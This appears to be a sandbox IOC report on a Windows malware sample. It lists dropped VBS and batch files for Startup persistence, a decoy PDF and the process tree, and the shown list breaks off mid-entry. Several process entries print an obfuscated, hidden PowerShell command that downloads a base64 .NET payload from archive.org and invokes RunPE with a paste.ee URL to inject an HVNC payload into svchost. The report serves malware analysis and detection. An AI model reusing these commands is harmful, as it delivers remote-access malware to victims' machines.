IOC Report
TM3utH2CsU.exe

Files

File Path
Type
Category
Malicious
TM3utH2CsU.exe
PE32+ executable (GUI) x86-64, for MS Windows
initial sample
malicious
C:\Users\Public\Documents\pow\wm.vbs
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
malicious
C:\Users\Public\Documents\sys\hnvc.vbs
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
malicious
C:\Users\Public\Documents\sys\pure_hnvc.bat
ASCII text, with no line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\escrivan.vbs
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start_32.bat
DOS batch file, ASCII text
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start_pow.bat
DOS batch file, ASCII text
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start_sys.bat
DOS batch file, ASCII text
dropped
malicious
C:\Users\Public\Documents\32.zip
Zip archive data, at least v1.0 to extract, compression method=store
dropped
C:\Users\Public\Documents\32\hnvc.vbs
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\Public\Documents\32\pure_hnvc.bat
ASCII text, with no line terminators
dropped
C:\Users\Public\Documents\pow.zip
Zip archive data, at least v1.0 to extract, compression method=store
dropped
C:\Users\Public\Documents\pow\wm_startup.bat
ASCII text, with no line terminators
dropped
C:\Users\Public\Documents\privacy_policy.pdf
PDF document, version 1.4, 21 pages
dropped
C:\Users\Public\Documents\sys.zip
Zip archive data, at least v1.0 to extract, compression method=store
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
Unknown
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\a03f3437-c869-4963-b39c-73632da25766.tmp
Unknown
modified
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
data
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-240925103625Z-159.bmp
PC bitmap, Windows 3.x format, 114 x -152 x 32, cbSize 69366, bits offset 54
dropped
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
SQLite 3.x database, last written using SQLite version 3040000, file counter 17, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 17
dropped
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal
SQLite Rollback Journal
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
Certificate, Version=3
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
data
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
data
modified
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING
data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents
SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal
SQLite Rollback Journal
dropped
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\CasPol.exe.log
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\MSI131a7.LOG
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0mmafd3r.geb.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_13ghpsd0.oxy.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_13l01yib.may.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1lswtshj.igo.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1omnke05.kff.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_22jhlxbo.bus.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2cbfgsev.x2e.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3gk12rlt.j4o.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3iztureu.lt2.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3sd255tm.mvz.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3upcrvko.dyi.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_41o3pwl3.fne.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_435004lx.ivc.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4bgmpf34.wox.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4eq3vw0d.4pe.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4nxfpexn.c4b.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5edoxzd4.prv.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aqvykjtw.gic.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_axojubg2.ote.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bgpk1s42.pnq.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fa1mv0yc.scl.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fhmymu0d.jpt.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fxq2aurb.l3o.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gucnsmjs.n5d.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gx4yjvop.m1b.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hj53pggn.ent.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hoi51suy.joo.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ht4w4kes.y10.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hvbn3hws.x0s.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i4xb0313.ctl.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i5uhqkfc.ize.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ignnvsba.dkz.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jggpslft.0py.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jwsbcsvb.uzn.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kmifqdva.sqd.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mhhtzuef.vw4.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n0waln0l.w4o.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nx2t3vrt.4yf.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p30xohyh.zyq.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pdzxutyk.bxl.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pgjazuau.muy.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ph4uzhul.fde.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ponmtoeq.jh0.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_psgavopf.acp.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qc35t2hp.2bi.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s1dba01j.akx.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sftw0qaa.apz.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sodo4jvb.pjc.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ttb44ke0.gdp.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tusgfaw1.uik.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u5icckra.bta.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ug00ufuo.i0k.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vylrls3b.b4q.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w1nc4kh0.gj0.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w25rhdh4.ht2.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wfvnc1ev.dah.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wfxhpert.jcm.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wjgdyvnt.1mp.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wqk0mj54.njy.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wsjta0dh.ncd.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wyh3lfqi.uup.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x3iq3ndc.lmj.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xq4tz5r5.grc.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yejmp1fs.3fe.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yf0o4zqd.rg4.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ynr2jv4t.d3y.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zgw0ixsm.eed.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zhiffkq2.gvh.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zq5xdzsk.fvr.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zstexuq3.i2b.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\acrobat_sbx\A91wuryg5_1macxqe_66c.tmp
Zip data (MIME type "application/vnd.adobe.air-ucf-package+zip"?)
dropped
C:\Users\user\AppData\Local\Temp\acrobat_sbx\A9l67tgh_1macxqc_66c.tmp
Zip data (MIME type "application/vnd.adobe.air-ucf-package+zip"?)
dropped
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-09-25 06-36-23-782.log
ASCII text, with very long lines (393)
dropped
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
ASCII text, with very long lines (393), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\acrocef_low\3265f9c8-163c-476b-8f0b-06cfb3aed09e.tmp
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
dropped
C:\Users\user\AppData\Local\Temp\acrocef_low\38843709-4979-49cf-96ff-d7102243e935.tmp
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
dropped
C:\Users\user\AppData\Local\Temp\acrocef_low\6503714d-8986-44a5-b034-5f48a42a5452.tmp
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
dropped
C:\Users\user\AppData\Local\Temp\acrocef_low\ca961033-22cb-4e5b-b9f6-2ebf3458f0f6.tmp
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
dropped
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl
data
dropped
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl
data
dropped
There are 125 hidden files not shown in this list.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\TM3utH2CsU.exe
"C:\Users\user\Desktop\TM3utH2CsU.exe"
malicious
C:\Windows\System32\cmd.exe
"cmd" /C start C:\Users\Public\Documents\privacy_policy.pdf
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\System32\cmd.exe
cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\sys\pure_hnvc.bat""
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\sys\hnvc.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
malicious
C:\Windows\System32\cmd.exe
cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\sys\pure_hnvc.bat""
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\sys\hnvc.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
malicious
C:\Windows\System32\cmd.exe
cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\sys\pure_hnvc.bat""
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\sys\hnvc.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
malicious
C:\Windows\System32\cmd.exe
"cmd" /C echo %username%
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\System32\cmd.exe
cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\pow\wm_startup.bat""
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\pow\wm.vbs"
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\System32\PING.EXE
ping 127.0.0.1 -n 10
malicious
C:\Windows\System32\cmd.exe
cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\pow\wm_startup.bat""
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\pow\wm.vbs"
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\System32\PING.EXE
ping 127.0.0.1 -n 10
malicious
C:\Windows\System32\cmd.exe
cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\pow\wm_startup.bat""
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\pow\wm.vbs"
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\System32\PING.EXE
ping 127.0.0.1 -n 10
malicious
C:\Windows\System32\cmd.exe
"cmd" /C echo %username%
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\System32\cmd.exe
cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\32\pure_hnvc.bat""
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\32\hnvc.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
